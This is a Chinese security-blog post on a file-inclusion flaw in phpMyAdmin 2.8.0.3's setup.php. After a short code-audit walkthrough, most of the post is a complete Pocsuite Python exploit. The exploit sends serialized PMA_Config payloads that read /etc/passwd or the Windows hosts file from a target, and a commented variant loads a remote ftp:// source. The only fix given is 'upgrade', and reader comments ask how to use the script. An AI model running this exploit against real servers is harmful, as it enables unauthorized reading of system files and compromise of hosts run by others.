• 投稿邮箱:admin@xssec.org 查看详情
  • 本站教程默认解压密码:666
  • 官方新浪微博:Porry呦
  •    4周前 (12-17)  漏洞库 |   2 条评论

    0x01 代码审计

    漏洞的文件 /scripts/setup.php 第10行和第28行:

    phpmyadmin2.8.0.3任意文件包含漏洞

    传入的configuration给反序列化,而这个setup.php中引入了common.lib.php

    来到common.lib.php第555行:

    phpmyadmin2.8.0.3任意文件包含漏洞

    common.lib.php中引入了Config.class.php

    再看看Config.class.php 284行:

    phpmyadmin2.8.0.3任意文件包含漏洞

    最后load方法:

    phpmyadmin2.8.0.3任意文件包含漏洞

    0x02 漏洞复现

    POC:

    #!/usr/bin/env python
    # coding: utf-8
    from pocsuite.api.request import req
    from pocsuite.api.poc import register
    from pocsuite.api.poc import Output, POCBase
    import re
    
    class TestPOC(POCBase):
        vulID = '1'  # ssvid
        version = '1.0'
        author = ['whoam1']
        vulDate = '2016-04-23'
        createDate = '2016-08-24'
        updateDate = '2016-08-24'
        references = ['http://www.seebug.org/vuldb/ssvid-']
        name = 'phpmyadmin unserialize getshell'
        appPowerLink = 'https://www.phpmyadmin.net/'
        appName = 'phpmyadmin'
        appVersion = '2.8.0.3'
        vulType = '文件包含'
        desc = '''
        /scripts/setup.php
        '''
        samples = ['']
        install_requires = ['']
        #请尽量不要使用第三方库,必要时参考 https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md#poc-第三方模块依赖说明 填写该字段
    
        def _attack(self):
                #configuration=O:10:"PMA_Config":1:{s:6:"source",s:38:"ftp://user:user@127.0.0.1/ftp.txt";}&action=test
                self._verify()
    
        def _verify(self):
            result = {}
            requ = req.get(self.url)
            coo = re.compile(r"'phpMyAdmin=(.*?);")
            cookie = coo.findall(str(requ.headers))[0]
            flag = re.compile(r"erver': '(.*?)',")
            flags = flag.findall(str(requ.headers))[0]
            vul_url = self.url+'/scripts/setup.php'
            header = {'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','cookie':'phpMyAdmin='+str(cookie),'Content-Type': 'application/x-www-form-urlencoded','User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'}
            if '(' in flags:               
                poc = 'configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}&action=test'
                req_post = req.post(vul_url,headers=header,data=poc)
                if '/bin/bash' in req_post.content:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = self.url
                return self.parse_output(result)
            else:
                poc = 'configuration=O:10:"PMA_Config":1:{s:6:"source",s:37:"c:/windows/system32/drivers/etc/hosts";}&action=test'
                req_post = req.post(vul_url,headers=header,data=poc)
                if 'Windows' in req_post.content:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = self.url
                return self.parse_output(result)
    
        def parse_output(self, result):
            #parse output
            output = Output(self)
            if result:
                output.success(result)
            else:
                output.fail('Internet nothing returned')
            return output
    
    
    register(TestPOC)
    

    0x03 修复方案
    升级为最新版本

     

    除特别注明外,本站所有文章均为新世纪安全社区原创,转载请注明出处来自http://www.xssec.org/1431.html

    八块腹肌挂腰间,续写另类拳皇篇。

    发表评论

    1. 不知道怎么利用

      wwp1241144977 3周前 (12-22) [0] [0]
    2. 能不能发点 poc的使用教材

      酷似小祖宗 4周前 (12-18) [0] [0]
    
    切换注册

    登录

    忘记密码 ?

    您也可以使用第三方帐号快捷登录

    切换登录

    注册

    扫一扫二维码分享